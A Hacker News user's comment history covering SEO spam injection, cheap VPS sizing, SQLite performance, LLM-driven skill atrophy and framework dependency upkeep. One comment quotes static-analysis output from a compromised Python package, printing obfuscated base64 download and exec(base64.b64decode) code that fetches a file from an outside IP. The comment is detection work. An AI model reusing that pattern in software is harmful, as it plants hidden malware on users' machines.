Hacker Newsnew | past | comments | ask | show | jobs | submit | f311a's commentslogin

They inject backlinks, SEO spam to advertise payday loans, online pharmacy, casino and so on. Just imagine you can get 30k of links to your website at once. Google will rank that page very high.

One pharmacy shop that sells generics or unlicensed casino can make tens of thousands of dollars per day. So even one week is enough to make a lot of money.


There are zero reasons to limit yourself to 1GB of RAM. By paying $20 instead of $5 you can get at least 8gb of RAM. You can use it for caches or a database that supports concurrent writes. The $15 difference won’t make any financial difference if you are trying to run a small business.

Thinking about on how to fit everything on a $5 VPS does not help your business.


$15 is not exactly zero, is it? If you don't need more than 1GB, why pay anything for more than 1GB?

I recall running LAMP stacks on something like 128MB about 20 years ago and not really having problems with memory. Most current website backends are not really much more complicated than they were back then if you don't haul in bloat.


It is. With 10k MRR it represents 0.15% of the revenue. Having the whole backend costing that much for a company selling web apps is like it’s costing zero.

You probably don't make 10k MMR on day one. If you make many small apps, it can make sense to learn how to run things lean to have 4x longer runway per app.

The runway is going to be your time and attention span, not $10/mo.

I don't know what you value your time or opportunity cost as... but the $10/mo doesn't need to save very many minutes of your time deferring dealing with a resource constraint or add too much reliability to pay off.

If resource limitations end up upsetting one end user, that costs more than $10.


This assumes you have to spend any time or attention worrying. 1GB is plenty of memory for backend type stuff.

And most VPSs allow increasing memory with a click of a button and a reboot.


Overspending for the sake of overspending is not smart in life or business.

Saving 15 USD on 10k+ USD MMR is ridiculous.

Saving 15 USD on 0 USD MMR while still building the business is priceless. Virtually infinite runway.

Only if your time is worthless and someone else is paying your living expenses.

Given how much revenue depends on the experience of a web app and loading times, I’d be happy to pay 100$ a month on that revenue if I don’t have to sacrifice a second of additional loading time no matter how clever I was optimizing it.

That 1 second of loading time probably has more to do with heavy frontends and third-party scripts, than the backend server's capacity.

$100 is peanuts to most businesses, of course. But even so, I'd rather spend it on fixing an actual bottleneck.


Not all businesses depend on milliseconds being shaved off the loading times

For example: Ticketmaster makes a ton of money and their site is complete dogshit.


There’s a happy medium and $5 for 1GB RAM just isn’t it.

Be sure to inform the author of the article who is currently making money on his 1GB VPS that he hasn’t found a happy medium

Not a very strong argument now is it?

if the project already has positive revenue then arguably the ability to capture new users is worth a lot, which requires acceptable performance even when a big traffic surge is happening (like a HN hug of attention)

if the scalability is in the number of "zero cost" projects to start, then 5 vs 15 is a 3x factor.


NVME read latency is around 100usec, a SQLite3 database in the low terabytes needs somewhere between 3-5 random IOs per point lookup, so you're talking worst case for an already meaningful amount of data about 0.5ms per cold lookup. Say your app is complex and makes 10 of these per request, 5 ms. That leaves you serving 200 requests/sec before ever needing any kind of cache.

That's 17 million hits per day in about 3.9 MiB/sec sustained disk IO, before factoring in the parallelism that almost any bargain bucket NVME drive already offers (allowing you to at least 4x these numbers). But already you're talking about quadrupling the infrastructure spend before serving a single request, which is the entire point of the article.


You won't get such numbers on a $5 VPS, the SSDs that are used there are network attached and shared between users.

Not quite $5, but a $6.71 Hetzner VPS

    # ioping -R /dev/sda

    --- /dev/sda (block device 38.1 GiB) ioping statistics ---
    22.7 k requests completed in 2.96 s, 88.8 MiB read, 7.68 k iops, 30.0 MiB/s
    generated 22.7 k requests in 3.00 s, 88.8 MiB, 7.58 k iops, 29.6 MiB/s
    min/avg/max/mdev = 72.2 us / 130.2 us / 2.53 ms / 75.6 us

Rereading this, I have no idea where 3.9 MiB/sec came from, that 200 requests/sec would be closer to 8 MiB/sec

> There are zero reasons to limit yourself to 1GB of RAM

There is a good reason: teaching yourself not to over-engineer, over-provision, or overthink, and instead to focus on generating business value to customers and getting more paying customers. I think it’s what many engineers are keen to overlook behind fun technical details.


> There is a good reason: teaching yourself not to over-engineer, over-provision, or overthink, (...)

This is specious reasoning. You don't prevent anything by adding artificial constraints. To put things in perspective, Hetzner's cheapest vCPU plan comes with 4GB of RAM.


If I give you a box with 1 GiB of RAM, you are literally forced to either optimize your code to run in it, or accept the slowdown from paging. How is this specious?

Why not a box with 128MB of RAM then?

Aside from the perfect solution fallacy, pragmatically it's because most operating systems require more than that to run. Debian's current recommended minimum is 512 MB, though they note that with swap enabled, as little as 350 MB is possible. If you wanted to run something more esoteric like Damn Small Linux, it's possible with as little as 64 MB last I checked.

In any case, this is for the OS itself - the webserver, application, database, etc. will all of course require their own. For a well-optimized program with a well-optimized schema, 1 GB is a reasonable lower bound.


Oh I'm well aware of the existence of operating systems that run in 32MB of RAM or less. So - why not? I think a well-optimised application server (especially one that uses SQLite as a datastore like the article proposes) can fit just fine in 128MB of RAM total, or 256MB if we're being generous. A whole gigabyte of memory seems rather extravagant, no? You could run half a dozen properly optimised apps on such a box.

> If I give you a box with 1 GiB of RAM, you are literally forced to either optimize your code to run in it, or accept the slowdown from paging. How is this specious?

It is specious reasoning. Self-imposing arbitrary constraints don't make you write good, performant code. At most it makes your apps run slower because they will needlessly hit your self-impose arbitrary constraints.

If you put any value on performant code you just write performance-oriented code, regardless of your constraints. It's silly to pile on absurd constraints and expect performance to be an outcome. It's like going to the gym and work out with a hand tied behind your back, and expect this silly constraints to somehow improve the outcome of your workout. Complete nonsense.

And to drive the point home, this whole concern is even more perplexing as you are somehow targeting computational resources that fall below free tiers of some cloud providers. Sheer lunacy.


The gym analogy fails. Isolation exercises are almost exactly what you described. They target individual muscles to maximize hypertrophy, i.e. "improve the outcome of your workout."

Constraints provide feedback. Real-world example from my job: we have no real financial constraints for dev teams. If their poor schema or query design results in SLO breaches, and they opt to upsize their DB instead of spending the effort to fix the root problem, that is accepted. They have no incentive to do otherwise, because there are no constraints.

I think your analogy is flawed; a more apt one would be training with deliberately reduced oxygen levels, which trains your body to perform with fewer resources. Once you lift that constraint, you’ll perform better.

You’re correct that you can write performant code without being required to do so, but in practice, that is a rare trait.


I think we have to re-think and re-evaluate RAM usage on modern systems that use swapping with CPU-assisted page compression and fast, modern NVMe drives.

The Macbook Neo with 8GB RAM is a showcase of how people underistimated its capabilities due to low amount of RAM before launch, yet after release all the reviewers point to a larger set of capabilities without any issues that people didn't predict pre-launch.


$5 VPS disks are nowhere near macbooks, they are shared between users and often connected via network. They don't seat close to CPU.

Memory compression sounds like going back to DOS days. I think we're better off with writing tighter more performant code with no YAGNI. Alas, vibe coding will probably not get us there anytime soon.

Apple laptop CPUs have hardware memory compression and exceptionally high memory bandwidth for a CPU, and with their latest devices, very high storage bandwidth for a consumer SSD, so the equation is very different from the old DOS days.

Also, macOS is generally exceptional at caching and making efficient use of the fast solid state chips.

Or better yet, go with a euro provider like Hetzner and get 8GB of RAM for $10 or so. :)

Even their $5 plan gives 4GB.


I've been using Linode for years and just yday went to use Hetzner for a new VPS and they wanted my home address and passport. No thanks.

They also have servers in the US (east and west coast).

I don't think they offer their cheapest options (CX*) outside of Germany/Finland though. Singapore and USA are a bit pricier.

The reason would be YAGNI. Apparently 1GB doesn’t constitute an actual limit for OP’s use case. I’m sure he’ll upgrade if and when the need arises.

Hetzner, OVH and others offer 4-8gb and 2-4 cores for the same ~5$

While I agree that the $15 difference won’t make any financial difference, I look at the numbers from another angle. The main idea here, as per my understanding, is to reduce the hosting cost as much as possible.

It doesn't look like they think about how to make it fit though. They just use a known good go template

Where can you get 8GB for $20?

> There are zero reasons to limit yourself to 1GB of RAM. By paying $20 instead of $5 you can get at least 8gb of RAM.

In my head, I call this the 'doubling algorithm'.

If there's anything that's both relatively cheap and useful, but where "more" (either in quality or quantity) has additional utility, 2x it.

Then 2x it again.

Repeat until either: the price change becomes noticeable or utility stops being gained.

Tl;dr -- saving order-of single dollars is rarely worth the tradeoffs.


> "There are zero reasons to limit yourself to 1GB of RAM"

> Immediately proposes alternative which is literally 4x the cost.


What are you using that utilizes Apple containers?


They did not even try to hide the payload that much.

Every basic checker used by many security companies screams at `exec(base64.b64decode` when grepping code using simple regexes.

  hexora audit 4.87.1/2026-03-27-telnyx-v4.87.1.zip  --min-confidence high  --exclude HX4000

  warning[HX9000]: Potential data exfiltration with Decoded data via urllib.request.request.Request.
       ┌─ 2026-03-27-telnyx-v4.87.1.zip:tmp/tmp_79rk5jd/telnyx/telnyx/_client.py:77
  86:13
       │
  7783 │         except:
  7784 │             pass
  7785 │
  7786 │         r = urllib.request.Request(_d('aHR0cDovLzgzLjE0Mi4yMDkuMjAzOjgwODAvaGFuZ3VwLndhdg=='), headers={_d('VXNlci1BZ2VudA=='): _d('TW96aWxsYS81LjA=')})
       │             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HX9000
  7787 │         with urllib.request.urlopen(r, timeout=15) as d:
  7788 │             with open(t, "wb") as f:
  7789 │                 f.write(d.read())
       │
       = Confidence: High
         Help: Data exfiltration is the unauthorized transfer of data from a computer.


  warning[HX4010]: Execution of obfuscated code.
       ┌─ 2026-03-27-telnyx-v4.87.1.zip:tmp/tmp_79rk5jd/telnyx/telnyx/_client.py:78
  10:9
       │
  7807 │       if os.name == 'nt':
  7808 │           return
  7809 │       try:
  7810 │ ╭         subprocess.Popen(
  7811 │ │             [sys.executable, "-c", f"import base64; exec(base64.b64decode('{_p}').decode())"],
  7812 │ │             stdout=subprocess.DEVNULL,
  7813 │ │             stderr=subprocess.DEVNULL,
  7814 │ │             start_new_session=True
  7815 │ │         )
       │ ╰─────────^ HX4010
  7816 │       except:
  7817 │           pass
  7818 │
       │
       = Confidence: VeryHigh
         Help: Obfuscated code exec can be used to bypass detection.


Are there more tools like hexora?


GuardDog, but it's based on regexes


JQ is very convenient, even if your files are more than 100GB. I often need to extract one field from huge JSON line files, I just pipe jq to it to get results. It's slower, but implementing proper data processing will take more time.


More than 100GB can be 101GB, 500GB or 1TB+. I was speaking about 1TB+ files. I'm not sure you can get it faster unless you have a parallel processor.


Their previous release would be easily caught by static analysis. PTH is a novel technique.

Run all your new dependencies through static analysis and don't install the latest versions.

I implemented static analysis for Python that detects close to 90% of such injections.

https://github.com/rushter/hexora


Interesting tool, will definitely try - just curious, is there a tool (hexora checker) that ensures that hexora itself and its dependencies are not compromised ? And of course if there is one, I'll need another one for the hexora checker....


There is no such tool, but you can use other static analyzers. Datadog also has one, but it's not AST-based.



And easily bypassed by an attacker who knows about your static analysis tool who can iterate on their exploit until it no longer gets flagged.


the main things are:

1. pin dependencies with sha signatures 2. mirror your dependencies 3. only update when truly necessary 4. at first, run everything in a sandbox.


They actually did not add LinkedIn specifically. It's an AI translator that accepts anything in the `to` field.

https://translate.kagi.com/?from=en&to=Crypto%20Scammer&text...


So I've seen. It's just the LinkedIn one is what they advertised. Speaks to the fact that it's probably some slopcoded thing, which I'd usually get mildly upset about but who can muster the effort in this economy. I think the point still stands though.


Why is this upvoted? The author did not even bother to read what he wrote.

> SOC 2 Type II ready

Huh? You vibecoded the repo in a week and claim it ready?


I meant since this is designed to be deployed in companies private VPC, their data stays with them. Zero vendor data risk. Corrected it. Thanks for pointing it out.


> I still understand how everything works,

That's partly an illusion. Try doing everything manually. After only using inline suggestions for six months a few years ago, I've noticed that my skills have gotten way worse. I became way slower. You have to constantly exercise your brain.

This reminds me of people who watch tens of video courses about programming, but can't code anything when it comes to a real job. They have an illusion of understanding how to code.

For AI companies, that's a good thing. People's skills can atrophy to the point that they can't code without LLMs.

I would suggest practicing it from time to time. It helps with code review and keeping the codebase at a decent level. We just can't afford to vibecode important software.

LLMs produce average code, and when you see it all day long, you get used to it. After getting used to it, you start to merge bad code because suddenly it looks good to you.


The GP seems to run a decentralized AI hosting company built on top of a crypto chain.

Can you get any fadd-ier than that? Of course they love AI.


I have a hard time using languages I know without an LSP when all ive been doing is using lsp and its suggestions.

I cant imagine how it is for people tha try to manually write after years of heavy llm usage


I disagree. I used to do a lot of math years ago. If you gave me some problems to do now I probably wouldn't be able to recall exactly how to solve them. But if you give me a written solution I will still be able to give you with 100% confidence a confirmation that it is correct.

This is what it means to understand something. It's like P Vs NP. I don't need to find the solution, I just need to be able to verify _a_ solution.


Well, I‘m still using my brain from morning to evening, but I‘m certainly using it differently.

This will without a doubt become a problem if the whole AI thing somehow collapses or becomes very expensive!

But it’s probably the correct adaptation if not.


> That's partly an illusion. Try doing everything manually. After only using inline suggestions for six months a few years ago, I've noticed that my skills have gotten way worse. I became way slower. You have to constantly exercise your brain.

YMMV, but I'm not seeing this at all. You might get foggy around things like the particular syntax for some advanced features, but I'll never forget what a for loop is, how binary search works, or how to analyze time complexity. That's just not how human cognition works, assuming you had solid understanding before.

I still do puzzles like Advent of Code or problems from competitive programming from time to time because I don't want to "lose it," but even if you're doing something interesting, a lot of practical programming boils down to the digital equivalent of "file this file into this filing," mind-numbingly boring, forgettable code that still has to be written to a reasonable standard of quality because otherwise everything collapses.


Want to try to do anything more complicated? I have seen a lot of delusional people around, who think their skills are still on the same level, but in interviews they bomb at even simple technical topics, when practical implementations are concerned.

If you don't code ofc you won't be as good at coding, that's a practical fact. Sure, beyond a certain skill level your decline may not be noticeable early because of the years of built-in practice and knowledge.

But considering every year there is so much more interesting technology if you don't keep improving in both hands-on learning and slow down to take stock, you won't be capable of anything more than delusional thinking about how awesome your skill level is.


I love the batteries that RoR or Django gives you, but then I also remember how much time it takes to maintain old projects. Updating a project that was started 5-6 years ago takes a lot of time. Part of that is managing dependencies. For Django, they can easily go above 100. Some of them have to be compiled with specific versions of system libraries. Even Docker does not save you from a lot of problems.

Right now, I would rather use Go with a simple framework, or even without one. With Go, it's so easy just to copy the binary over.


I'm working on a large (at least 300k+ loc) Django code base right now and we have 32 direct dependencies. Mostly stuff like lxml, pillow and pandas. It's very easy to use all the nice Django libs out there but you don't have to.


I was talking about total deps, not direct. By installing something like Celery, you get 8-10 extra dependencies that, in turn, can also have extra deps. And yeah, extra deps can conflict with each other as well.


I find the thought daunting but the reality surprisingly easy.

You just keep up as you go, as long as you keep things close to the framework it's fine.


> You just keep up as you go

He said "Updating a project that was started 5-6 years ago takes a lot of time."


Yes but GP said "In reality it's not that much".


Not much work every few months turns into a lot over years, especially if you skip a few of those "every few months" events.


I'm confused. It's too much work to upgrade dependencies, but not too much time to write from scratch and maintain, in perpetuity, original code?


Yes. I've probably spent more time maintaining a trivial Rails app originally written in 2007 than I spent writing it in the first place.


But if you would have rewritten the entire app every time you needed to update the dependencies, that would have taken even more time.


That is obviously true but doesn't mean as much as you seem to think. Washing laundry is also not much work but it adds up to a lot over the years, especially if you skip a few weeks of laundry every once in a while. That is not an excuse to not do it.

The answer is the same in both cases: acquire some discipline and treat maintenance with the respect it deserves.


It is easy, and people tend to do what is easy. It takes more effort to minimise dependencies. Your boss or your client will not even notice.

Obviously there are some dependencies that you cannot easily avoid (like the things you mention). On the other hand there is a lot off stuff used that is not that hard to avoid - things like wrappers for REST APIs are often not really necessary.


Sometimes I think the issue here is churn. Security fixes aside, what is it that updated dependencies really give? Can't some of these projects just... stop?


The issue with that is, that the longer you wait to upgrade dependencies, the more pronounced the problems upgrading it will become generally speaking, because more incompatibilities accumulate. If those 5-6 year old projects were updated every now and then, then the pain to get them updated would be far less. As you point out, security is an aspect too, so you can leave the project inactive, but then you might hit that problem.


Dependency hell. Usually how it goes is you have to develop a new feature, you find a library or a newer version of the framework that solves the problem but it depends on a version of another library that is incompatible with the one in your project. You update the conflicting dependency and get 3 new conflicts, and when you fix those conflicts you get 5 new conflicts, and repeat.


So churn causes more churn.

Also breaking APIs should be regarded very poorly. It isn’t. But it should be.


I agree, but let's say you are looking for a library to solve your problem - you see one repo updated 2 weeks ago and the other one updated 5 years ago - which one do you choose?


That depends. What problem do I have, exactly?

Do I need a library to sort an array? The 5 years ago option is going to be the more likely choice. A library updated 2 weeks ago is highly suspicious.

Do I need a library to provide timezone information? The 2 weeks ago option, unquestionably. The 5 years ago option will now be woefully out of date.


Perhaps some kind of ‘this code is still alive’ flag is key. Even just updating the project. Watching issues. Anything showing ‘active but done’.


The real issue with Rails apps is keeping up with the framework and language versions. There are really two categories of dependencies.

One-off libraries that don't have a runtime dependency on Rails are typically very low-maintenance. You can mostly leave them alone (even a security vulnerability is unlikely to be exploitable for how you're using one of these, as often user input isn't even getting through to them). For instance a gem you install to communicate with the stripe API is not typically going to break when you upgrade Rails. Or adding httparty to make some API requests to other services.

Then there are libraries that are really framework extensions, like devise for authentication or rspec for testing. These are tightly coupled to Rails, sometimes to its private internals, and you get all sorts of nasty compatibility issues when the framework changes. You have to upgrade Rails itself because you really do need to care about security support at that level, even for a relatively small company, so you can end up in a situation where leaving these other dependencies to fester makes upgrading Rails very hard.

(I run a startup that's a software-enabled service to upgrade old Rails apps).


I think you could only get around this by forcing your whole dependency chain to only add non-breaking security fixes (or backport them for all versions in existence). Otherwise small changes will propagate upwards and snowball into major updates.


Indeed that’s what a lot of Elixir and Erlang packages do, if it’s done then it’s done.


"Security fixes aside" is too dismissive. Transitive dependencies with real CVEs can feel like the tail wagging the dog, but ignore them at your peril.


I have not had this experience as badly with Laravel. Their libraries seem much more stable to me. We've gone up 5 major versions of Laravel over the last year and a half and it was pretty simple for each major version.


Laravel is extremely stable and consistent.


I have plenty of RoR in production with millions of users, yearly we upgrade the projects and it's fine, not as catastrophic as it sounds, even easier with Opus now


Does batteries included somehow result in upgrading years old projects being a larger lift? I would think the opposite.


My experience has been the opposite, especially since Rails has included more batteries over the years. You need fewer non-Rails-default dependencies than ever, and the upgrade process has gotten easier every major version.


Rails is way more stable and mature these days. Keeping up to date is definitely easier. Probably 10x easier than a Node/JS project which will have far more churn.


I also think it's the opposite, since the dependencies are almost guaranteed to be compatible with each other. And I think Ruby libraries in particular are usually quite stable and maintained for a long time.


My medium-sized Django projects had close to 100 dependencies, and when you want to update to a new Django version, the majority of them must be updated too.

Thankfully, updating to a new Django version is usually simple. It does not require many code changes.

But finding small bugs after an update is hard, unless you have very good test coverage. New versions of middleware/Django plugins often behave slightly differently, and it's hard to keep track of all the changes when you have so many dependencies.


It really depends how they were built. I have large Django apps running for a very long time that require minimal maintenance, but it’s because we were very deliberate about dependencies.

But I learned to do that by working on codebases that were the opposite.


Different experience with Django. I am only using a handful of deps. dj-database-url, dj-static, gunicorn, psycopg are the only "mandatory" or conserved one IMO as a baseline.


Use UV for dep management. Make sure you have tests.

In the past month I migrated a 20 year old Python project (2.6, using the pylons library) to modern Python in 2 days. Runs 40-80 times faster too.


It used to take at least a day of work. In a post-2025/11 world, it is under an hour. Maybe even 15 minutes if you've landed on a high quality LLM session.


Complete opposite of my experience


In my experience, the magic makes the easy parts easier and the hard parts harder


Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: